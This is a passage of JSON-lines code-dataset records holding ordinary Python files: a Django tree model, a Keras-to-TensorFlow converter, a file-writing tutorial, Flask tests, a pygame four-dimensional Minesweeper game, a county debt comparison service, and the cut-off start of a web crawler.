utils.models import CreationModificationDateMixin\n\n\nclass Plan(CreationModificationDateMixin, MPTTModel):\n title = models.CharField(\"Title\", max_length=250)\n notes = models.TextField(blank=True,)\n parent = TreeForeignKey(\"self\", blank=True, null=True)\n\n def __str__(self):\n return self.title\n\n class Meta:\n ordering = [\"tree_id\", \"lft\"]\n verbose_name = \"Plan\"\n verbose_name_plural = \"Plans\"\n\n\n\n","sub_path":"planning/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"586370533","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nThis script will convert tf.keras model file to\nTensorflow pb model.\n\"\"\"\nimport os\nimport ast\nimport argparse\n\nimport tensorflow as tf\nfrom tensorflow.keras import backend as K\nfrom tensorflow.keras.models import load_model\n\nK.set_learning_phase(False)\n\n\ndef freeze_session(session, keep_var_names=None, output_names=None, clear_devices=True):\n graph = session.graph\n with graph.as_default():\n freeze_var_names = list(set(v.op.name for v in tf.global_variables()).difference(keep_var_names or []))\n output_names = output_names or []\n output_names += [v.op.name for v in tf.global_variables()]\n input_graph_def = graph.as_graph_def()\n if clear_devices:\n for node in input_graph_def.node:\n node.device = \"\"\n frozen_graph = tf.graph_util.convert_variables_to_constants(session, input_graph_def, output_names, freeze_var_names)\n return frozen_graph\n\n\ndef save_model(keras_model, session, pb_model_path):\n x = keras_model.input\n y = keras_model.output\n prediction_signature = tf.saved_model.signature_def_utils.predict_signature_def({\"inputs\": x}, {\"prediction\": y})\n builder = tf.saved_model.builder.SavedModelBuilder(pb_model_path)\n legacy_init_op = tf.group(tf.tables_initializer(), name='legacy_init_op')\n signature = {tf.saved_model.signature_constants.DEFAULT_SERVING_SIGNATURE_DEF_KEY: prediction_signature, }\n builder.add_meta_graph_and_variables(session, [tf.saved_model.tag_constants.SERVING], signature_def_map=signature, legacy_init_op=legacy_init_op)\n builder.save()\n\n\ndef run(keras_model_file, output_path):\n sess = K.get_session()\n model = load_model(keras_model_file)\n output_names = [node.op.name for node in model.outputs]\n _ = freeze_session(sess, output_names=output_names)\n save_model(keras_model=model, session=sess, pb_model_path=output_path)\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--output_path', help='Full path of the output pb model.', type=str)\n parser.add_argument('--keras_model_file', help='Full filepath of HDF5 file containing tf.Keras model.', type=str)\n\n args = parser.parse_args()\n if not args.output_path:\n raise ValueError('output_path not specified')\n if not args.keras_model_file:\n raise ValueError('keras_model_file not specified')\n\n run(args.keras_model_file, args.output_path)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"tools/keras_to_tf.py","file_name":"keras_to_tf.py","file_ext":"py","file_size_in_byte":2494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"559155159","text":"#Reading and writing to files\r\n\r\n\"\"\"\r\n'r' --->open files in read only mode\r\n'w' --->open file in write only mode or create file\r\n'w+' --->open file in a reading and writing modes\r\n'a' --->Append to a file\r\n\r\nwith-as ---> automaticaly closes the file for you\r\n\"\"\"\r\nfile_one = open(\"test.txt\", \"w\")\r\nfile_one.write(\"this is the first test with writing in a file \")\r\nfile_one.close()\r\n\r\n\r\n\r\nfile_one = open(\"test.xls\", \"w\")\r\nfile_one.write(\"this is the first test with writing in a file \")\r\nfile_one.close()\r\n\r\n\r\n#Automaticaly closes file for you\r\n\r\n# with open(\"Textfiletwo.txt\", \"a\") as demo_file:\r\n# demo_file.write(\"appended text\")\r\n\r\n","sub_path":"tutorial/writing_to_file.py","file_name":"writing_to_file.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"498427071","text":"import unittest\n\nimport unittest\nfrom flask import current_app, url_for\nfrom app import create_app, db\nfrom app.models import Post\n\n\nclass ViewTestCase(unittest.TestCase):\n def setUp(self):\n self.app = create_app('testing')\n self.app_context = self.app.app_context()\n self.app_context.push()\n db.create_all()\n self.client = self.app.test_client()\n\n def tearDown(self):\n db.session.remove()\n db.drop_all()\n self.app_context.pop()\n\n def test_home_page(self):\n response = self.client.get(url_for('main.index'))\n self.assertEqual(200, response.status_code)\n\n def test_get_a_post(self):\n post = Post(\n title='title',\n body='body'\n )\n db.session.add(post)\n db.session.commit()\n\n response = self.client.get(url_for('main.post', pk=post.id))\n self.assertEqual(200, response.status_code)\n response_data = response.get_data()\n self.assertIn('body', response_data)\n self.assertIn('title', response_data)\n","sub_path":"tests/test_app_main/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"320673310","text":"import pygame\r\nimport random\r\nfrom pygame.locals import*\r\nimport sys\r\n\r\npygame.init() # Pygameの初期化\r\nscreen = pygame.display.set_mode((630, 520))\r\nclock = pygame.time.Clock() # クロックの設定。異なるPCで異なる速さの動作になることを防ぐ\r\npygame.display.set_caption(\"4D MINESWEEPER\") # タイトルバーに表示する文字\r\nimg_bomb=pygame.image.load('datafile_4dms\\\\bomb.png')\r\nimg_bomb=pygame.transform.scale(img_bomb,(32,32))\r\npygame.display.set_icon(img_bomb)\r\n\r\nclass Linked_State:\r\n def __init__(self,parent,model):\r\n self.focused=False\r\n self.linklis=[]\r\n self.sublis=[]\r\n self.parent=parent\r\n self.model=model\r\n self.view=None\r\n \r\n def add_link(self,sobj):\r\n self.linklis.append(sobj)\r\n \r\n def add_substate(self,sobj):\r\n self.sublis.append(sobj)\r\n \r\n def focus(self):\r\n self.focused=True\r\n \r\n def add_model(self,model):\r\n self.model=model\r\n \r\n def set_view(self):\r\n return None\r\n \r\n def defocus(self):\r\n self.focused=False\r\n \r\n def submove(self,i):\r\n for a in range(len(self.sublis)):\r\n self.sublis[a].focused=False\r\n self.sublis[i].focused=True\r\n \r\n def get_focused(self):\r\n return self.focused\r\n \r\n def move(self,i):\r\n self.defocus()\r\n self.linklis[i].focus()\r\n \r\n def view_reinit(self,i):\r\n self.linklis[i].view.reinit()\r\n \r\n def act(self,s):\r\n return None\r\n \r\n def show(self):\r\n return None\r\n\r\nclass StateMachine:\r\n def __init__(self,model):\r\n self.statelis=[]\r\n self.model=model\r\n self.curstate=0\r\n self.mx=0\r\n self.my=0\r\n \r\n def add_state(self,sobj):\r\n self.statelis.append(sobj)\r\n \r\n def set_mpos(self,ax,ay):\r\n self.mx=ax\r\n self.my=ay\r\n \r\n def get_mpos(self):\r\n return (self.mx,self.my)\r\n \r\n def input_to_mes(self):\r\n ev=pygame.event.get()\r\n receive='not_det'\r\n for a in ev:\r\n if a.type==pygame.KEYDOWN:\r\n if a.key==97:#A\r\n receive='left'\r\n elif a.key==119:#W\r\n receive='up'\r\n elif a.key==100:#D\r\n receive='right'\r\n elif a.key==115:#S\r\n receive='down'\r\n elif a.key==122:\r\n receive='det'\r\n if a.type==pygame.MOUSEBUTTONDOWN:\r\n if a.button==1:\r\n receive='click_left'\r\n elif a.button==3:\r\n receive='click_right'\r\n ax,ay=a.pos\r\n self.set_mpos(ax,ay)\r\n \r\n return receive\r\n \r\n def act(self):\r\n s=self.input_to_mes()\r\n if self.statelis[self.curstate].get_focused()==True:\r\n self.statelis[self.curstate].act(s)\r\n else:\r\n c=0\r\n for a in self.statelis:\r\n if a.get_focused()==True:\r\n a.act(s)\r\n self.curstate=c\r\n break\r\n c+=1\r\n \r\n def show(self):\r\n if self.statelis[self.curstate]\\\r\n .get_focused()==True:\r\n self.statelis[self.curstate].show()\r\n else:\r\n c=0\r\n for a in self.statelis:\r\n if a.get_focused()==True:\r\n a.show()\r\n self.curstate=c\r\n break\r\n c+=1\r\n\r\nclass Model:\r\n def __init__(self):\r\n return None\r\n\r\nclass View:\r\n def __init__(self,parent,model):\r\n self.parent=parent\r\n self.model=model\r\n \r\n def act(self,receive):\r\n return None\r\n \r\n def show(self):\r\n return None\r\n\r\nclass MS_Model(Model):\r\n def __init__(self):\r\n self.length=4\r\n l=self.length\r\n \r\n self.arr_neighbor\\\r\n =[[[[0 for a in range(l)] for b in range(l)]\r\n for c in range(l)] for d in range(l)]\r\n \r\n self.arr_bomb\\\r\n =[[[[0 for a in range(l)] for b in range(l)]\r\n for c in range(l)] for d in range(l)]\r\n\r\n self.arr_flag\\\r\n =[[[[0 for a in range(l)] for b in range(l)]\r\n for c in range(l)] for d in range(l)]\r\n\r\n self.arr_digged\\\r\n =[[[[0 for a in range(l)] for b in range(l)]\r\n for c in range(l)] for d in range(l)]\r\n\r\n self.sum_bombs=0\r\n self.sum_flags=0\r\n self.rest_bombs=0\r\n self.rest_flags=0\r\n self.sum_digged=0\r\n \r\n def clear_arrays(self):\r\n l=self.length\r\n self.arr_neighbor\\\r\n =[[[[0 for a in range(l)] for b in range(l)]\r\n for c in range(l)] for d in range(l)]\r\n \r\n self.arr_bomb\\\r\n =[[[[0 for a in range(l)] for b in range(l)]\r\n for c in range(l)] for d in range(l)]\r\n\r\n self.arr_flag\\\r\n =[[[[0 for a in range(l)] for b in range(l)]\r\n for c in range(l)] for d in range(l)]\r\n\r\n self.arr_digged\\\r\n =[[[[0 for a in range(l)] for b in range(l)]\r\n for c in range(l)] for d in range(l)]\r\n \r\n def set_sum_rest(self,num):\r\n self.sum_bombs=num\r\n self.sum_flags=num\r\n self.rest_bombs=num\r\n self.rest_flags=num\r\n \r\n def put_bombs(self):\r\n for a in range(self.sum_bombs):\r\n while True:\r\n v=random.randint(0,self.length-1)\r\n w=random.randint(0,self.length-1)\r\n x=random.randint(0,self.length-1)\r\n y=random.randint(0,self.length-1)\r\n if self.arr_bomb[v][w][x][y]==0:\r\n self.arr_bomb[v][w][x][y]=1\r\n break\r\n \r\n def count_neighbor(self):\r\n for v in range(self.length):\r\n for w in range(self.length):\r\n for x in range(self.length):\r\n for y in range(self.length):\r\n if self.arr_bomb[v][w][x][y]==1:\r\n for dv in range(-1,2):\r\n for dw in range(-1,2):\r\n for dx in range(-1,2):\r\n for dy in range(-1,2):\r\n bv=(v+dv>=0 and v+dv<=self.length-1)\r\n bw=(w+dw>=0 and w+dw<=self.length-1)\r\n bx=(x+dx>=0 and x+dx<=self.length-1)\r\n by=(y+dy>=0 and y+dy<=self.length-1)\r\n if bv and bw and bx and by:\r\n self.arr_neighbor[v+dv][w+dw][x+dx][y+dy]+=1\r\n \r\n def moredig(self,metay,metax,y,x):\r\n if self.arr_flag[metay][metax][y][x]==1:\r\n return None\r\n if self.arr_digged[metay][metax][y][x]==0:\r\n self.arr_digged[metay][metax][y][x]=1\r\n self.sum_digged+=1\r\n if self.arr_neighbor[metay][metax][y][x]>0:\r\n return None\r\n for dmy in range(-1,2):\r\n for dmx in range(-1,2):\r\n for dy in range(-1,2):\r\n for dx in range(-1,2):\r\n if dmy==0 and dmx==0 and y==0 and x==0:\r\n p=None\r\n else:\r\n bmy=(metay+dmy>=0 and metay+dmy<=self.length-1)\r\n bmx=(metax+dmx>=0 and metax+dmx<=self.length-1)\r\n by=(y+dy>=0 and y+dy<=self.length-1)\r\n bx=(x+dx>=0 and x+dx<=self.length-1)\r\n if bmy and bmx and by and bx:\r\n if self.arr_digged[metay+dmy][metax+dmx][y+dy][x+dx]==0:\r\n p=self.moredig(metay+dmy,metax+dmx,y+dy,x+dx)\r\n return None\r\n \r\n def end_digged_bomb(self):\r\n for a in range(self.length):\r\n for b in range(self.length):\r\n for c in range(self.length):\r\n for d in range(self.length):\r\n if self.arr_bomb[a][b][c][d]==1 and self.arr_digged[a][b][c][d]==1:\r\n self.arr_bomb[a][b][c][d]=0\r\n\r\n def dig_all_bomb(self):\r\n for a in range(self.length):\r\n for b in range(self.length):\r\n for c in range(self.length):\r\n for d in range(self.length):\r\n if self.arr_bomb[a][b][c][d]==1:\r\n self.arr_digged[a][b][c][d]=1\r\n\r\nclass V_Click_To_Start(View):\r\n def __init__(self,parent,model):\r\n self.parent=parent\r\n self.model=model\r\n self.fontlis=[]\r\n fn=pygame.font.SysFont('hg創英角ゴシックubhgp創英角ゴシックubhgs創英角ゴシックub',30)\r\n self.fontlis.append(fn.render('四次元マインスイーパー',False,(255,200,0)))\r\n self.fontlis.append(fn.render('左クリックで開始',False,(255,200,0)))\r\n self.img_bg=pygame.image\\\r\n .load('datafile_4dms\\\\titlebg.png')\r\n\r\n def act(self,receive):\r\n if receive=='click_left':\r\n return 'start'\r\n else:\r\n return 'not_det'\r\n \r\n def show(self):\r\n screen.blit(self.img_bg,(0,0))\r\n screen.blit(self.fontlis[0],(150,210))\r\n screen.blit(self.fontlis[1],(180,250))\r\n\r\nclass S_Click_To_Start(Linked_State):\r\n def __init__(self,parent,model):\r\n self.focused=False\r\n self.linklis=[]\r\n self.parent=parent\r\n self.model=model\r\n self.view=V_Click_To_Start(self,self.model)\r\n\r\n def act(self,receive):\r\n s=self.view.act(receive)\r\n if s=='start':\r\n self.move(0)\r\n \r\n def show(self):\r\n self.view.show()\r\n\r\nclass S_Setup_BF(Linked_State):\r\n def __init__(self,parent,model):\r\n self.focused=False\r\n self.linklis=[]\r\n self.parent=parent\r\n self.model=model\r\n self.view=None\r\n\r\n def act(self,receive):\r\n self.model.clear_arrays()\r\n self.model.set_sum_rest(random.randint(4,8))\r\n self.model.put_bombs()\r\n self.model.count_neighbor()\r\n self.model.sum_digged=0\r\n self.move(0)\r\n \r\n def show(self):\r\n return None\r\n\r\nclass V_PlayMain(View):\r\n def __init__(self,parent,model):\r\n self.parent=parent\r\n self.model=model\r\n self.masu=26\r\n self.dx=200\r\n self.dy=10\r\n self.metay=0\r\n self.metax=0\r\n self.y=0\r\n self.x=0\r\n self.img_bomb=pygame.image\\\r\n .load('datafile_4dms\\\\bomb.png')\r\n self.img_fire=pygame.image\\\r\n .load('datafile_4dms\\\\fire.png')\r\n self.img_flag=pygame.image\\\r\n .load('datafile_4dms\\\\flag.png')\r\n self.img_bomb=pygame.transform.scale(self.img_bomb,(self.masu,self.masu))\r\n self.img_fire=pygame.transform.scale(self.img_fire,(self.masu,self.masu))\r\n self.img_flag=pygame.transform.scale(self.img_flag,(self.masu,self.masu))\r\n\r\n self.fontsty=pygame.font.SysFont('hg創英角ゴシックubhgp創英角ゴシックubhgs創英角ゴシックub',22)\r\n self.font=(self.fontsty.render('0',False,(0,0,0)))\r\n self.fontlis=[]\r\n self.fontlis.append(self.fontsty.render(\r\n '爆弾の総数:{}個'.format(0),False,(200,200,200)))\r\n self.fontlis.append(self.fontsty.render(\r\n '立てた旗:{}本'.format(0),False,(200,200,200)))\r\n self.fontlis.append(self.fontsty.render(\r\n '残りの旗:{}本'.format(0),False,(200,200,200)))\r\n \r\n def in_field(self,px,py):\r\n ppx=px-self.dx\r\n ppy=py-self.dy\r\n if ppx>=0 and ppx<=self.masu*self.model.length*self.model.length\\\r\n and ppy>=0 and ppy<=self.masu*self.model.length*self.model.length:\r\n return True\r\n else:\r\n return False\r\n \r\n def get_arrpos(self,px,py):\r\n ppx=px-self.dx\r\n ppy=py-self.dy\r\n metax=0\r\n metay=0\r\n x=0\r\n y=0\r\n for a in range(self.model.length):\r\n if a*self.model.length*self.masu<=ppx and ppx<(a+1)*self.model.length*self.masu:\r\n metax=a\r\n ppx+=(-1)*a*self.model.length*self.masu\r\n break\r\n for a in range(self.model.length):\r\n if a*self.model.length*self.masu<=ppy and ppy<(a+1)*self.model.length*self.masu:\r\n metay=a\r\n ppy+=(-1)*a*self.model.length*self.masu\r\n break\r\n for a in range(self.model.length):\r\n if a*self.masu<=ppx and ppx<(a+1)*self.masu:\r\n x=a\r\n break\r\n for a in range(self.model.length):\r\n if a*self.masu<=ppy and ppy<(a+1)*self.masu:\r\n y=a\r\n break\r\n return [metay,metax,y,x]\r\n \r\n def get_savedpos(self):\r\n return [self.metay,self.metax,self.y,self.x]\r\n \r\n def draw_grid(self):\r\n l=self.model.length\r\n for a in range(l*l+1):\r\n pygame.draw.line(screen,(150,150,150),(a*self.masu+self.dx,self.dy)\r\n ,(a*self.masu+self.dx,l*l*self.masu+self.dy),1)\r\n pygame.draw.line(screen,(150,150,150),(self.dx,a*self.masu+self.dy)\r\n ,(l*l*self.masu+self.dx,a*self.masu+self.dy),1)\r\n\r\n for a in range(self.model.length+1):\r\n pygame.draw.line(screen,(150,150,150),(a*l*self.masu+self.dx,self.dy)\r\n ,(a*l*self.masu+self.dx,l*l*self.masu+self.dy),3)\r\n pygame.draw.line(screen,(150,150,150),(self.dx,a*l*self.masu+self.dy)\r\n ,(l*l*self.masu+self.dx,a*l*self.masu+self.dy),3)\r\n \r\n def draw_tile(self):\r\n l=self.model.length\r\n for my in range(l):\r\n for mx in range(l):\r\n for y in range(l):\r\n for x in range(l):\r\n r=pygame.Rect(self.dx+(l*mx+x)*self.masu,\r\n self.dy+(l*my+y)*self.masu,self.masu,self.masu)\r\n if self.model.arr_digged[my][mx][y][x]==0:\r\n if self.model.arr_flag[my][mx][y][x]==1:\r\n pygame.draw.rect(screen,(200,200,200),r)\r\n screen.blit(self.img_flag,\r\n (self.dx+(l*mx+x)*self.masu,\r\n self.dy+(l*my+y)*self.masu))\r\n else:\r\n pygame.draw.rect(screen,(70,70,70),r)\r\n else:\r\n if self.model.arr_bomb[my][mx][y][x]==1:\r\n pygame.draw.rect(screen,(250,240,0),r)\r\n screen.blit(self.img_bomb,\r\n (self.dx+(l*mx+x)*self.masu,\r\n self.dy+(l*my+y)*self.masu))\r\n else:\r\n pygame.draw.rect(screen,(0,0,0),r)\r\n num_bom=self.model.arr_neighbor[my][mx][y][x]\r\n if num_bom>0:\r\n self.font=(self.fontsty.render(str(num_bom)\r\n ,False,(250,50,0)))\r\n screen.blit(self.font,\r\n (self.dx+(l*mx+x)*self.masu+3,\r\n self.dy+(l*my+y)*self.masu+1))\r\n\r\n def draw_property(self):\r\n self.fontlis[0]=self.fontsty.render(\r\n '爆弾の総数:{}個'.format(self.model.sum_bombs),\r\n False,(200,200,200))\r\n self.fontlis[1]=self.fontsty.render(\r\n '立てた旗:{}本'.format(self.model.sum_flags-self.model.rest_flags),\r\n False,(200,200,200))\r\n self.fontlis[2]=self.fontsty.render(\r\n '残りの旗:{}本'.format(self.model.rest_flags),\r\n False,(200,200,200))\r\n screen.blit(self.fontlis[0],(10,10))\r\n screen.blit(self.fontlis[1],(10,40))\r\n screen.blit(self.fontlis[2],(10,70))\r\n\r\n def act(self,receive):\r\n if receive=='click_left' or receive=='click_right':\r\n if receive=='click_left':\r\n receive='cl_in_field'\r\n elif receive=='click_right':\r\n receive='cr_in_field'\r\n p=self.parent.parent.get_mpos()\r\n px=p[0]\r\n py=p[1]\r\n if self.in_field(px,py)==True:\r\n s=self.get_arrpos(px,py)\r\n self.metay=s[0]\r\n self.metax=s[1]\r\n self.y=s[2]\r\n self.x=s[3]\r\n return receive\r\n else:\r\n return 'not_det'\r\n else:\r\n return 'not_det'\r\n \r\n def show(self):\r\n screen.fill((0,0,0))\r\n self.draw_tile()\r\n self.draw_grid()\r\n self.draw_property()\r\n\r\nclass S_PlayMain(Linked_State):\r\n def __init__(self,parent,model):\r\n self.focused=False\r\n #0:gameover, 1:gameclear \r\n self.linklis=[]\r\n self.sublis=[]\r\n self.parent=parent\r\n self.model=model\r\n self.view=V_PlayMain(self,model)\r\n\r\n def act(self,receive):\r\n s=self.view.act(receive)\r\n if s=='cl_in_field':\r\n t=self.view.get_savedpos()\r\n dst=self.model.arr_digged[t[0]][t[1]][t[2]][t[3]]\r\n est=self.model.arr_flag[t[0]][t[1]][t[2]][t[3]]\r\n if dst==0 and est==0:\r\n self.model.moredig(t[0],t[1],t[2],t[3])\r\n if self.model.arr_bomb[t[0]][t[1]][t[2]][t[3]]==1:\r\n self.move(0)\r\n else:\r\n if self.model.sum_digged>=(self.model.length**4)-self.model.sum_bombs:\r\n self.move(1)\r\n elif s=='cr_in_field':\r\n t=self.view.get_savedpos()\r\n dst=self.model.arr_flag[t[0]][t[1]][t[2]][t[3]]\r\n if dst==0 and self.model.rest_flags>0:\r\n self.model.arr_flag[t[0]][t[1]][t[2]][t[3]]=1\r\n self.model.rest_flags+=-1\r\n elif dst==1:\r\n self.model.arr_flag[t[0]][t[1]][t[2]][t[3]]=0\r\n self.model.rest_flags+=1\r\n \r\n def show(self):\r\n self.view.show()\r\n\r\nclass V_Gameover(V_PlayMain):\r\n def __init__(self,parent,model):\r\n self.parent=parent\r\n self.model=model\r\n self.masu=26\r\n self.dx=200\r\n self.dy=10\r\n self.counter=0\r\n\r\n self.fontsty=pygame.font.SysFont('hg創英角ゴシックubhgp創英角ゴシックubhgs創英角ゴシックub',22)\r\n self.font=(self.fontsty.render('0',False,(0,0,0)))\r\n self.fontlis=[]\r\n self.fontsty2=pygame.font.SysFont('hg創英角ゴシックubhgp創英角ゴシックubhgs創英角ゴシックub',30)\r\n self.fontlis.append(self.fontsty2.render('ゲームオーバー',False,(0,0,0)))\r\n self.fontlis.append(self.fontsty2.render('左クリックで再挑戦',False,(0,0,0)))\r\n\r\n self.img_bomb=pygame.image\\\r\n .load('datafile_4dms\\\\bomb.png')\r\n self.img_fire=pygame.image\\\r\n .load('datafile_4dms\\\\fire.png')\r\n self.img_flag=pygame.image\\\r\n .load('datafile_4dms\\\\flag.png')\r\n self.img_bomb=pygame.transform.scale(self.img_bomb,(self.masu,self.masu))\r\n self.img_fire=pygame.transform.scale(self.img_fire,(self.masu,self.masu))\r\n self.img_flag=pygame.transform.scale(self.img_flag,(self.masu,self.masu))\r\n\r\n self.img_gov=pygame.image\\\r\n .load('datafile_4dms\\\\gov.png')\r\n\r\n def act(self,receive):\r\n if self.counter<10:\r\n self.counter+=1\r\n return 'not_det'\r\n elif self.counter>=10 and self.counter<20:\r\n if self.counter==10:\r\n s='unit_fire'\r\n else:\r\n s='not_det'\r\n self.counter+=1\r\n return s\r\n elif self.counter>=20 and self.counter<30:\r\n if self.counter==20:\r\n s='bomb_leak'\r\n else:\r\n s='not_det'\r\n self.counter+=1\r\n return s\r\n elif self.counter>=30 and self.counter<40:\r\n if self.counter==30:\r\n s='all_fire'\r\n else:\r\n s='not_det'\r\n self.counter+=1\r\n return s\r\n else:\r\n if receive=='click_left':\r\n self.counter=0\r\n return 'retry'\r\n \r\n def draw_unit_fire(self):\r\n l=self.model.length\r\n for my in range(l):\r\n for mx in range(l):\r\n for y in range(l):\r\n for x in range(l):\r\n r=pygame.Rect(self.dx+(l*mx+x)*self.masu,\r\n self.dy+(l*my+y)*self.masu,self.masu,self.masu)\r\n if self.model.arr_digged[my][mx][y][x]==1:\r\n if self.model.arr_bomb[my][mx][y][x]==1:\r\n pygame.draw.rect(screen,(250,240,0),r)\r\n screen.blit(self.img_fire,\r\n (self.dx+(l*mx+x)*self.masu,\r\n self.dy+(l*my+y)*self.masu))\r\n \r\n def show(self):\r\n if self.counter<10:\r\n screen.fill((0,0,0))\r\n self.draw_tile()\r\n self.draw_grid()\r\n elif self.counter>=10 and self.counter<20:\r\n screen.fill((0,0,0))\r\n self.draw_tile()\r\n self.draw_unit_fire()\r\n self.draw_grid()\r\n elif self.counter>=20 and self.counter<30:\r\n screen.fill((0,0,0))\r\n self.draw_tile()\r\n self.draw_grid()\r\n elif self.counter>=30 and self.counter<40:\r\n screen.fill((0,0,0))\r\n self.draw_tile()\r\n self.draw_unit_fire()\r\n self.draw_grid()\r\n else:\r\n screen.blit(self.img_gov,(0,0))\r\n screen.blit(self.fontlis[0],(200,210))\r\n screen.blit(self.fontlis[1],(180,260))\r\n\r\nclass S_Gameover(Linked_State):\r\n def __init__(self,parent,model):\r\n self.focused=False\r\n self.linklis=[]\r\n self.sublis=[]\r\n self.parent=parent\r\n self.model=model\r\n self.view=V_Gameover(self,self.model)\r\n \r\n def act(self,receive):\r\n s=self.view.act(receive)\r\n if s=='bomb_leak':\r\n self.model.end_digged_bomb()\r\n self.model.dig_all_bomb()\r\n if s=='retry':\r\n self.move(0)\r\n \r\n def show(self):\r\n self.view.show()\r\n\r\nclass V_Gameclear(V_PlayMain):\r\n def __init__(self,parent,model):\r\n self.parent=parent\r\n self.model=model\r\n self.masu=26\r\n self.dx=200\r\n self.dy=10\r\n self.counter=0\r\n\r\n self.fontsty=pygame.font.SysFont('hg創英角ゴシックubhgp創英角ゴシックubhgs創英角ゴシックub',22)\r\n self.font=(self.fontsty.render('0',False,(0,0,0)))\r\n self.fontlis=[]\r\n self.fontsty2=pygame.font.SysFont('hg創英角ゴシックubhgp創英角ゴシックubhgs創英角ゴシックub',30)\r\n self.fontlis.append(self.fontsty2.render('ゲームクリア',False,(255,200,0)))\r\n self.fontlis.append(self.fontsty2.render('左クリックで再挑戦',False,(255,200,0)))\r\n\r\n self.img_bomb=pygame.image\\\r\n .load('datafile_4dms\\\\bomb.png')\r\n self.img_fire=pygame.image\\\r\n .load('datafile_4dms\\\\fire.png')\r\n self.img_flag=pygame.image\\\r\n .load('datafile_4dms\\\\flag.png')\r\n self.img_bomb=pygame.transform.scale(self.img_bomb,(self.masu,self.masu))\r\n self.img_fire=pygame.transform.scale(self.img_fire,(self.masu,self.masu))\r\n self.img_flag=pygame.transform.scale(self.img_flag,(self.masu,self.masu))\r\n\r\n self.img_bg=pygame.image\\\r\n .load('datafile_4dms\\\\titlebg.png')\r\n \r\n def act(self,receive):\r\n if self.counter<10:\r\n self.counter+=1\r\n return 'not_det'\r\n else:\r\n if receive=='click_left':\r\n self.counter=0\r\n return 'retry'\r\n \r\n def show(self):\r\n if self.counter<10:\r\n screen.fill((0,0,0))\r\n self.draw_tile()\r\n self.draw_grid()\r\n else:\r\n screen.blit(self.img_bg,(0,0))\r\n screen.blit(self.fontlis[0],(200,210))\r\n screen.blit(self.fontlis[1],(180,260))\r\n\r\nclass S_Gameclear(Linked_State):\r\n def __init__(self,parent,model):\r\n self.focused=False\r\n self.linklis=[]\r\n self.sublis=[]\r\n self.parent=parent\r\n self.model=model\r\n self.view=V_Gameclear(self,self.model)\r\n \r\n def act(self,receive):\r\n s=self.view.act(receive)\r\n if s=='retry':\r\n self.move(0)\r\n \r\n def show(self):\r\n self.view.show()\r\n\r\nmodel=MS_Model()\r\nstatemachine=StateMachine(model)\r\nscts=S_Click_To_Start(statemachine,model)\r\nstatemachine.add_state(scts)\r\nssbn=S_Setup_BF(statemachine,model)\r\nstatemachine.add_state(ssbn)\r\nscts.add_link(ssbn)\r\nsplm=S_PlayMain(statemachine,model)\r\nstatemachine.add_state(splm)\r\nssbn.add_link(splm)\r\nsgov=S_Gameover(statemachine,model)\r\nstatemachine.add_state(sgov)\r\nsplm.add_link(sgov)\r\nsgcl=S_Gameclear(statemachine,model)\r\nstatemachine.add_state(sgcl)\r\nsplm.add_link(sgcl)\r\n\r\nsgov.add_link(ssbn)\r\nsgcl.add_link(ssbn)\r\n\r\nstatemachine.statelis[0].focus()\r\n\r\np=False\r\nwhile(p==False):\r\n clock.tick(20)\r\n screen.fill((200,200,200))\r\n statemachine.act()\r\n statemachine.show()\r\n pygame.display.update()\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n print('unko')\r\n pygame.quit()\r\n sys.exit()","sub_path":"4Dminesweeper.py","file_name":"4Dminesweeper.py","file_ext":"py","file_size_in_byte":25845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"32470430","text":"from debt_context.services.context_base import ContextBase\nfrom debt_context.models import CountyDebt\n\n\nclass CountyContextService(ContextBase):\n def __init__(self, county):\n self.county = county\n\n def context_population(self):\n output = []\n population = self.county.population\n\n if population == None:\n return [self.county]\n\n output = output + list(CountyDebt.objects.filter(population__gt=population).\\\n order_by('population')[:2])\n\n output.append(self.county)\n output = output + list(CountyDebt.objects.filter(population__lt=population).\\\n order_by('-population')[:2])\n\n return output\n\n def context_tax_debt_per_capita(self):\n output = []\n tax_debt_per_capita = self.county.tax_debt_per_capita\n\n if tax_debt_per_capita == None:\n return [self.county]\n\n output = output + list(CountyDebt.objects.filter(tax_debt_per_capita__gt=tax_debt_per_capita).\\\n order_by('tax_debt_per_capita')[:2])\n\n output.append(self.county)\n output = output + list(CountyDebt.objects.filter(tax_debt_per_capita__gt=tax_debt_per_capita).\\\n order_by('-tax_debt_per_capita')[:2])\n\n return output\n\n def context_assessed_valuation(self):\n output = []\n tax_year_valuation = self.county.tax_year_valuation\n if tax_year_valuation == None:\n return [self.county]\n\n output = output + list(CountyDebt.objects.filter(tax_year_valuation__gt=tax_year_valuation).\\\n order_by('tax_year_valuation')[:2])\n\n output.append(self.county)\n output = output + list(CountyDebt.objects.filter(tax_year_valuation__lt=tax_year_valuation).\\\n order_by('-tax_year_valuation')[:2])\n\n return output\n","sub_path":"debt_context/services/county_context_service.py","file_name":"county_context_service.py","file_ext":"py","file_size_in_byte":1806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"174357950","text":"import sys\nfrom os.path import dirname, realpath\nsys.path.append(dirname(dirname(realpath(__file__))))\n\nfrom crawler.settings import *\n\nimport urllib2\nfrom bs4 import BeautifulSoup\nfrom readability.readability import Document\nfrom crawler.html_improver import HtmlImprover\n#from crawler.utils import gen_url_domain\n\n\ndef gen_url_domain(url):\n domain = url.replace('https://', '').replace('http://', '').split('/')[0]\n return domain\n\nif __name__ == '__main__':\n url = sys.argv[1]\n req_header = {\n 'User-Agent':'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11',\n 'Accept':'text/html;q=0.9,*/*;q=0.8',\n 'Accept-Charset':'ISO-8859-1,utf-8;q=0.7,*;q=0.3',\n 